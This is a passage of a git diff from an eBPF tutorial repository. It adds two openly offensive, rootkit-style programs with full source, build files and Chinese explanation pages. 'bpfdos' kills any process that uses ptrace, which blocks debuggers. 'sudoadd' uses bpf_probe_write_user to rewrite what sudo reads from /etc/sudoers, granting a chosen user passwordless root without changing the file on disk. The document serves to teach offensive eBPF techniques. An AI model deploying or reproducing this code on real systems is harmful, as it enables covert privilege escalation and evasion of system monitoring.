$(EXTRA_LDFLAGS) + +APPS = bpfdos # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. 
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/25-signal/bpfdos.bpf.c b/25-signal/bpfdos.bpf.c new file mode 100644 index 0000000..4c83a41 --- /dev/null +++ b/25-signal/bpfdos.bpf.c @@ -0,0 +1,49 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +SEC("tp/syscalls/sys_enter_ptrace") +int bpf_dos(struct trace_event_raw_sys_enter *ctx) +{ + long ret = 0; + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = 
pid_tgid >> 32; + + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Send signal. 9 == SIGKILL + ret = bpf_send_signal(9); + + // Log event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = pid; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + return 0; +} diff --git a/25-signal/bpfdos.c b/25-signal/bpfdos.c new file mode 100644 index 0000000..062a1c9 --- /dev/null +++ b/25-signal/bpfdos.c @@ -0,0 +1,129 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include "bpfdos.skel.h" +#include "common_um.h" +#include "common.h" + +// Setup Argument stuff +static struct env { + int target_ppid; +} env; + +const char *argp_program_version = "bpfdos 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = +"BPF DOS\n" +"\n" +"Sends a SIGKILL to any program attempting to use\n" +"the ptrace syscall (e.g. strace)\n" +"\n" +"USAGE: ./bpfdos [-t 1111]\n"; + +static const struct argp_option opts[] = { + { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." }, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) { + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Killed PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm); + else + printf("Failed to kill PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct bpfdos_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) { + return err; + } + + // Do common setup + if (!setup()) { + exit(1); + } + + // Open BPF application + skel = bpfdos_bpf__open(); + if (!skel) { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Set target ppid + skel->rodata->target_ppid = env.target_ppid; + + // Verify and load program + err = bpfdos_bpf__load(skel); + if (err) { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Attach tracepoint handler + err = bpfdos_bpf__attach( skel); + if (err) { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL); + if (!rb) { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + printf("Sending SIGKILL to any program using the bpf syscall\n"); + while (!exiting) { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) { + err = 0; + break; + } + if (err < 0) { + printf("Error polling perf buffer: %d\n", err); + 
break; + } + } + +cleanup: + bpfdos_bpf__destroy( skel); + return -err; +} diff --git a/25-signal/common.h b/25-signal/common.h new file mode 100644 index 0000000..ac4be7f --- /dev/null +++ b/25-signal/common.h @@ -0,0 +1,14 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/25-signal/common_um.h b/25-signal/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/25-signal/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/25-signal/index.html b/25-signal/index.html new file mode 100644 index 0000000..13c4a55 --- /dev/null +++ b/25-signal/index.html @@ -0,0 +1,213 @@ + + + + + + 使用 bpf_send_signal 发送信号终止进程 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

    用 bpf_send_signal 发送信号终止恶意进程

    +

    编译:

    +
    make
    +
    +

    使用方式:

    +
    sudo ./bpfdos
    +
    +

这个程序会对任何试图使用 ptrace 系统调用的程序(例如 strace)发送 SIGKILL 信号。一旦 bpfdos 开始运行,你可以通过运行以下命令进行测试:

    +
    strace /bin/whoami
    +
    +
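bpfdos 的内核态实现非常简短:它挂载在 sys_enter_ptrace 这个 tracepoint 上,对触发该系统调用的进程直接调用 bpf_send_signal 发送 SIGKILL。核心逻辑大致如下(摘自 bpfdos.bpf.c,省略了向环形缓冲区上报事件的部分):

    SEC("tp/syscalls/sys_enter_ptrace")
    int bpf_dos(struct trace_event_raw_sys_enter *ctx)
    {
        long ret = 0;
        size_t pid_tgid = bpf_get_current_pid_tgid();
        int pid = pid_tgid >> 32;

        // if target_ppid is 0 then we target all pids
        if (target_ppid != 0) {
            struct task_struct *task = (struct task_struct *)bpf_get_current_task();
            int ppid = BPF_CORE_READ(task, real_parent, tgid);
            if (ppid != target_ppid) {
                return 0;
            }
        }

        // Send signal. 9 == SIGKILL
        ret = bpf_send_signal(9);

        // ...(将 ret 与进程信息写入环形缓冲区,略)
        return 0;
    }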

    参考资料

    + + diff --git a/26-sudo/.gitignore b/26-sudo/.gitignore new file mode 100644 index 0000000..b15967f --- /dev/null +++ b/26-sudo/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +sudoadd diff --git a/26-sudo/LICENSE b/26-sudo/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/26-sudo/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/26-sudo/Makefile b/26-sudo/Makefile new file mode 100644 index 0000000..1c2357e --- /dev/null +++ b/26-sudo/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = sudoadd # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. 
We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. +CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/26-sudo/common.h b/26-sudo/common.h new file mode 100644 index 0000000..3e51864 --- /dev/null +++ b/26-sudo/common.h @@ -0,0 +1,37 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to 
sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 +#define max_payload_len 100 +#define sudoers_len 13 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/26-sudo/common_um.h b/26-sudo/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/26-sudo/common_um.h @@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/26-sudo/index.html b/26-sudo/index.html new file mode 100644 index 0000000..2a8da3d --- /dev/null +++ b/26-sudo/index.html @@ -0,0 +1,211 @@ + + + + + + 使用 eBPF 添加 sudo 用户 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

    使用 eBPF 添加 sudo 用户

    +

    编译:

    +
    make
    +
    +

    使用方式:

    +
    sudo ./sudoadd --username lowpriv-user
    +
    +

    这个程序允许一个通常权限较低的用户使用 sudo 成为 root。

    +

它的工作方式是:拦截 sudo 读取 /etc/sudoers 文件的过程,并把读到的第一行覆盖为 <username> ALL=(ALL:ALL) NOPASSWD:ALL #。这会欺骗 sudo,使其认为该用户被允许免密码成为 root。其他程序(如 cat 或 sudoedit)不受影响,对它们来说文件内容并没有改变,该用户也并不真正拥有这些权限。行尾的 # 确保该行的其余部分被当作注释处理,从而不会破坏 sudoers 文件的语法。

    +
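完整源码中,这个“覆盖”发生在 read 系统调用返回时的处理函数(handle_read_exit)里:先把 payload(形如 <username> ALL=(ALL:ALL) NOPASSWD:ALL #)拷入本地缓冲区,把剩余部分填充为 #,最后用 bpf_probe_write_user 写回 sudo 正在读取的用户态缓冲区。核心片段大致如下:

    // Overwrite first chunk of data
    // then add '#'s to comment out rest of data in the chunk.
    char local_buff[max_payload_len] = { 0x00 };
    bpf_probe_read(&local_buff, max_payload_len, (void*)buff_addr);
    for (unsigned int i = 0; i < max_payload_len; i++) {
        if (i >= payload_len) {
            local_buff[i] = '#';
        }
        else {
            local_buff[i] = payload[i];
        }
    }
    // Write data back to buffer
    long ret = bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len);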

    参考资料

    + + diff --git a/26-sudo/sudoadd.bpf.c b/26-sudo/sudoadd.bpf.c new file mode 100644 index 0000000..610d83a --- /dev/null +++ b/26-sudo/sudoadd.bpf.c @@ -0,0 +1,215 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to hold the File Descriptors from 'openat' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, unsigned int); +} map_fds SEC(".maps"); + +// Map to fold the buffer sized from 'read' calls +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buff_addrs SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// The UserID of the user, if we're restricting +// running to just this user +const volatile int uid = 0; + +// These store the string we're going to +// add to /etc/sudoers when viewed by sudo +// Which makes it think our user can sudo +// without a password +const volatile int payload_len = 0; +const volatile char payload[max_payload_len]; + +SEC("tp/syscalls/sys_enter_openat") +int handle_openat_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Check comm is sudo + char comm[TASK_COMM_LEN]; + bpf_get_current_comm(comm, sizeof(comm)); + const int sudo_len = 5; + const char *sudo = "sudo"; + for (int i = 0; i < sudo_len; i++) { + if (comm[i] != sudo[i]) { + return 0; + } + } + + // Now check we're opening sudoers + const char *sudoers = "/etc/sudoers"; + char filename[sudoers_len]; + bpf_probe_read_user(&filename, sudoers_len, (char*)ctx->args[1]); + for (int i = 0; i < sudoers_len; i++) { + if (filename[i] != sudoers[i]) { + return 0; + } + } + bpf_printk("Comm %s\n", comm); + bpf_printk("Filename %s\n", filename); + + // If filtering by UID check that + if (uid != 0) { + int current_uid = bpf_get_current_uid_gid() >> 32; + if (uid != current_uid) { + return 0; + } + } + + // Add pid_tgid to map for our sys_exit call + unsigned int zero = 0; + bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_openat") +int handle_openat_exit(struct trace_event_raw_sys_exit *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (check == 0) { + return 0; + } + int pid = pid_tgid >> 32; + + // Set the map value to be the returned file descriptor + unsigned int fd = (unsigned int)ctx->ret; + bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_enter_read") +int handle_read_enter(struct trace_event_raw_sys_enter *ctx) +{ + // Check this open call is opening our target file + size_t pid_tgid = bpf_get_current_pid_tgid(); + int pid = pid_tgid >> 32; + unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid); + if (pfd == 0) { + 
